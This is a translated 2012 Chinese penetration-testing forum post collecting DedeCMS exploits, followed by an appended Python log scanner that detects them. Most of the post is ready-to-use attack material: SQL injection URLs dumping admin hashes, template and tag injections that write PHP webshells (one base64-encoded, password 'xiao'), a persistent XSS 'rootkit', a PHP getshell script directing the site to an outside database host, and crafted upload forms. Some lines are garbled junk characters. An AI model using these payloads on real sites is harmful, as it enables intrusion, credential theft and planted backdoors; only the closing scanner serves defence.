中国网络渗透测试联盟

Title: dedecms vulnerability summary

Author: admin    Time: 2012-10-18 10:42
Title: dedecms vulnerability summary
Dedecms 5.6 rss injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCms v5.6 embedded malicious code execution vulnerability
Register as a member, upload software: in the local address field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After posting, viewing or editing it executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php with password xiao, writing a one-liner shell directly.

Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

DEDECMS all versions gotopage variable XSS vulnerability
1. Copy and paste the URL below into the browser; this triggers the XSS and installs the XSS rootkit. Note that IE8/9 and similar block URL-type XSS, so the XSS filter must be turned off.

http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2. Close the browser; however any of the URLs below is visited, our XSS fires.

http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

DeDeCMS (织梦) variable override getshell
#!usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.comwww.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].'
www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
echo "
Exploit Success \n";
if($aid==1)echo "
Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "
Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "
Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "
Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "
No response from ".$host."\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>

DedeCms v5.6-5.7 unauthorized access vulnerability (direct entry to the admin backend)

http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current captcha value and you go straight into the site backend.

This vulnerability requires first obtaining the backend path.

Dedecms 织梦 tag remote file write vulnerability
Prerequisite: you must have your own dede database ready, then insert the data: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');

Then submit with the form below and the shell is 1.php in the same directory. Work out the principle yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

DedeCms v5.6 embedded malicious code execution vulnerability
Register as a member, upload software: in the local address field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}; after posting, viewing or editing it executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
Generates x.php, password: xiao, writing a one-liner shell directly. Password xiao, you all know.

Dedecms <= V5.6 Final template execution vulnerability
1. Register a user, enter the member backend, post an article and upload an image, then in attachment management replace the image with our crafted template. Suppose the image name is:
uploads/userup/2/12OMX04-15A.jpg
The template content is (if the image format is restricted, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just posted, view the page source, and construct a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>
<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)
<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<input type='text' name='templet'
value="../ uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields'
value="templet,htmltext;">(construct this part)
</div>
<!-- form action area -->
<h3 class="meTitle">详细内容</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>
</div>
</form>
Submit; if it reports the edit succeeded, we have changed the template path. 3. Visit the edited article:
Assuming the aid of the article just edited is 2, we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.
2 E, B% ^& E4 ?! `
$ z. \/ u% B6 d$ R" o
8 i% l. n  u7 F* z) D% h( n/ d2 L# u# R% t/ U  \: b. a* @

DEDECMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>

Construct the form above; after upload the image is saved as /uploads/userup/3/1.gif
Post an article, then construct the edit form as follows:
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>

织梦 (Dedecms) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

织梦 (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The password is the 32-character MD5 with the first 5 characters and the last 7 removed, giving a 20-character MD5 password; the method is then to drop 3 from the front and 1 from the end, giving a 16-character MD5.
1 C! m2 |2 o/ e1 ^
+ {" C& I% b$ ?, a$ U2 y- q8 `* I! t% r
" }) G/ x! b7 s* |

织梦 (Dedecms) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
" Q: l$ Y4 {, I4 H
# p. E. X' ~7 v, E% l! n& p' q- ]% K. W" Q: d3 U; N" i& Y
+ b5 t$ W" x; M3 j; B. v( H& U
6 j2 N5 e. M- x4 N

织梦 (Dedecms) select_soft_post.php page uninitialized variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

织梦 (dedecms) 5.3 – 5.5 plus/digg_frame.php injection vulnerability
It exploits a MySQL numeric field overflow that raises an error, combined with DEDECMS writing database error messages to a PHP file whose header is not validated.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
An error message can be seen.

2. Visit
http://www.abc.com/data/mysql_error_trace.php and if you see the following output, the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Run the file test.html from dede.rar; note that the action address in the form is

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After pressing OK, seeing the step 2 output means the trojan file was uploaded successfully.

织梦 (DedeCms) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
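As an added, defender-side example that is not part of the original post, the Python below scans constructed access-log lines for the request shapes collected throughout this summary: GLOBALS/cfg_ override parameters (the variable-override, backend-login and select_soft_post payloads), advancedsearch.php with a raw sql= parameter, edit_face.php path traversal, markup in gotopage, '*/' in digg_frame.php parameters, and direct requests for data/mysql_error_trace.php. The log lines, IPs and rule names are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access-log lines (not real traffic). The request targets copy the
# shapes of the payloads collected in this post; IPs and hosts are documentation values.
SAMPLE_LOG = """\
198.51.100.5 - - [18/Oct/2012:10:42:01 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` HTTP/1.1" 200 512
198.51.100.6 - - [18/Oct/2012:10:42:02 +0800] "GET /dede/login.php?dopost=login&userid=admin&pwd=x&_POST[GLOBALS][cfg_dbhost]=203.0.113.9 HTTP/1.1" 302 0
198.51.100.7 - - [18/Oct/2012:10:42:03 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 10
198.51.100.8 - - [18/Oct/2012:10:42:04 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3E1%3C/script%3E HTTP/1.1" 200 3120
198.51.100.9 - - [18/Oct/2012:10:42:05 +0800] "GET /plus/digg_frame.php?aid=1024e1024&mid=*/?%3E HTTP/1.1" 200 77
198.51.100.10 - - [18/Oct/2012:10:42:06 +0800] "GET /data/mysql_error_trace.php HTTP/1.1" 200 1400
198.51.100.11 - - [18/Oct/2012:10:42:07 +0800] "GET /plus/advancedsearch.php?mid=1&keyword=dede HTTP/1.1" 200 2048
"""

# Combined-log request line: client, timestamp, method, target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Parameter names that reach DedeCMS configuration through request-variable
# registration, the mechanism every GLOBALS/cfg_ payload in this post relies on.
OVERRIDE_KEY = re.compile(r'^(?:_COOKIE|_POST|_GET|_REQUEST|GLOBALS)(?:\[|$)|^cfg_')

def decode_params(target):
    """Split a request target into its path and fully decoded (name, value) pairs."""
    parts = urlsplit(target)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    # Decode once more so a double-encoded name such as _POST%255BGLOBALS%255D collapses too.
    return parts.path, [(unquote(k), unquote(v)) for k, v in pairs]

def config_override(path, params):
    return any(OVERRIDE_KEY.match(k) for k, _ in params)

def raw_sql_param(path, params):
    # advancedsearch.php should never take a caller-supplied SQL statement.
    return path.endswith('/plus/advancedsearch.php') and any(k == 'sql' for k, _ in params)

def face_traversal(path, params):
    # edit_face.php delold with '..' in oldface: deletion outside the user's upload dir.
    return path.endswith('/member/edit_face.php') and any(
        k == 'oldface' and '..' in v for k, v in params)

def gotopage_markup(path, params):
    # gotopage is reflected into an attribute; quotes or angle brackets break out of it.
    return path.endswith('/login.php') and any(
        k == 'gotopage' and any(c in v for c in '<>"\'') for k, v in params)

def comment_breakout(path, params):
    # '*/' in a digg_frame.php parameter closes the comment in the error-trace file.
    return path.endswith('/plus/digg_frame.php') and any('*/' in v for _, v in params)

def error_trace_access(path, params):
    # The error log is a .php file under data/; outside requests for it are a red flag.
    return path.endswith('/data/mysql_error_trace.php')

RULES = {f.__name__: f for f in (config_override, raw_sql_param, face_traversal,
                                 gotopage_markup, comment_breakout, error_trace_access)}

def scan(log_text):
    """Return one (client_ip, path, rule_name) triple per rule hit, in log order."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line: skip it rather than abort the whole scan
        path, params = decode_params(m['target'])
        for name, rule in RULES.items():
            if rule(path, params):
                hits.append((m['ip'], path, name))
    return hits
```

Running scan(SAMPLE_LOG) flags the six payload-shaped lines and leaves the plain advancedsearch keyword search alone.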




